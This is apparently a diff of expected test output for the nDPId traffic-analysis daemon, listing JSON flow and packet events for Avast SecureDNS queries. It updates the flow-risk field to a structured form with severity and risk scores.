-00678{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625321675283,"flow_last_seen":1625321675283,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625321675283,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":61107,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625321675283,"flow_last_seen":1625321675283,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625321675283,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":61107,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1625321675403,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":1625321675403,"pkt":"YDjgxTWgeJS0JASgCABFAADMuxcAADMRL5K11iOVwKgCZAG77rMAuEweEl+BgAABAAEAAAAAATIJU0VDdVJFZE5zBWFWYXNUA0NPTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="}
-00720{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625321673727,"flow_last_seen":1625321673848,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625395217252,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":50581,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
-00720{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625321675283,"flow_last_seen":1625321675403,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625395217252,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":61107,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00829{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625321673727,"flow_last_seen":1625321673848,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625395217252,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":50581,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00829{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625321675283,"flow_last_seen":1625321675403,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625395217252,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":61107,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625395217252,"flow_last_seen":1625395217252,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625395217252,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64954,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1625395217252,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1625395217252,"pkt":"eJS0JASgYDjgxTWgCABFAABDKckAAH8RdWnAqAJktdYjlf26AbsAL3dTP5QBAAABAAAAAAAAATIJc0VjdVJlZE5zBUFWQVNUA2NvTQAAEAAB"}
-00678{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625395217252,"flow_last_seen":1625395217252,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625395217252,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64954,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625395217252,"flow_last_seen":1625395217252,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625395217252,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64954,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00680{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1625395217373,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":1625395217373,"pkt":"YDjgxTWgeJS0JASgCABFAADMg3oAADIRaC+11iOVwKgCZAG7\/boAuO\/BP5SBgAABAAEAAAAAATIJc0VjdVJlZE5zBUFWQVNUA2NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625395217373,"flow_last_seen":1625395217373,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625395217373,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59621,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1625395217373,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1625395217373,"pkt":"eJS0JASgYDjgxTWgCABFAABDKcUAAH8RdW3AqAJktdYjlejlAbsAL0m4oeQBAAABAAAAAAAAATIJc0VjVXJlRE5TBWF2QVNUA2NPbQAAEAAB"}
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625395217373,"flow_last_seen":1625395217373,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625395217373,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59621,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625395217373,"flow_last_seen":1625395217373,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625395217373,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59621,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1625395217373,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":1625395217373,"pkt":"YDjgxTWgeJS0JASgCABFAADMf00AADMRa1y11iOVwKgCZAG76OUAuMImoeSBgAABAAEAAAAAATIJc0VjVXJlRE5TBWF2QVNUA2NPbQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":21,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625395217373,"flow_last_seen":1625395217373,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625401091063,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59621,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
-00720{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":21,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625395217252,"flow_last_seen":1625395217373,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625401091063,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64954,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":21,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625395217373,"flow_last_seen":1625395217373,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625401091063,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59621,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00829{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":21,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625395217252,"flow_last_seen":1625395217373,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625401091063,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64954,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625401091063,"flow_last_seen":1625401091063,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625401091063,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":52485,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1625401091063,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1625401091063,"pkt":"eJS0JASgYDjgxTWgCABFAABDKc0AAH8RdWXAqAJktdYjlc0FAbsAL8xY+0MBAAABAAAAAAAAATIJc2VDdVJFZE5TBWF2YXNUA0NPbQAAEAAB"}
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625401091063,"flow_last_seen":1625401091063,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625401091063,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":52485,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625401091063,"flow_last_seen":1625401091063,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625401091063,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":52485,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1625401091190,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":1625401091190,"pkt":"YDjgxTWgeJS0JASgCABFAADMtpAAADMRNBm11iOVwKgCZAG7zQUAuETH+0OBgAABAAEAAAAAATIJc2VDdVJFZE5TBWF2YXNUA0NPbQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625401093323,"flow_last_seen":1625401093323,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625401093323,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54938,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1625401093323,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1625401093323,"pkt":"eJS0JASgYDjgxTWgCABFAABDKdEAAH8RdWHAqAJktdYjldaaAbsALxAyzbUBAAABAAAAAAAAATIJc2VjVVJlRE5zBWFWQVN0A2NvTQAAEAAB"}
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625401093323,"flow_last_seen":1625401093323,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625401093323,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54938,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625401093323,"flow_last_seen":1625401093323,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625401093323,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54938,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1625401093443,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":1625401093443,"pkt":"YDjgxTWgeJS0JASgCABFAADMuwEAADIRMKi11iOVwKgCZAG71poAuIigzbWBgAABAAEAAAAAATIJc2VjVVJlRE5zBWFWQVN0A2NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":25,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625401091063,"flow_last_seen":1625401091190,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625413810414,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":52485,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":25,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625401093323,"flow_last_seen":1625401093443,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625413810414,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54938,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":25,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625401091063,"flow_last_seen":1625401091190,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625413810414,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":52485,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":25,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625401093323,"flow_last_seen":1625401093443,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625413810414,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54938,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625413810414,"flow_last_seen":1625413810414,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625413810414,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56839,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1625413810414,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1625413810414,"pkt":"eJS0JASgYDjgxTWgCABFAABDy3cAAH8R07rAqAJktdYjld4HAbsAL+Cz9gYBAAABAAAAAAAAATIJU0VDdXJlZE5TBUFWQXN0A0NPbQAAEAAB"}
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625413810414,"flow_last_seen":1625413810414,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625413810414,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56839,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625413810414,"flow_last_seen":1625413810414,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625413810414,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56839,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
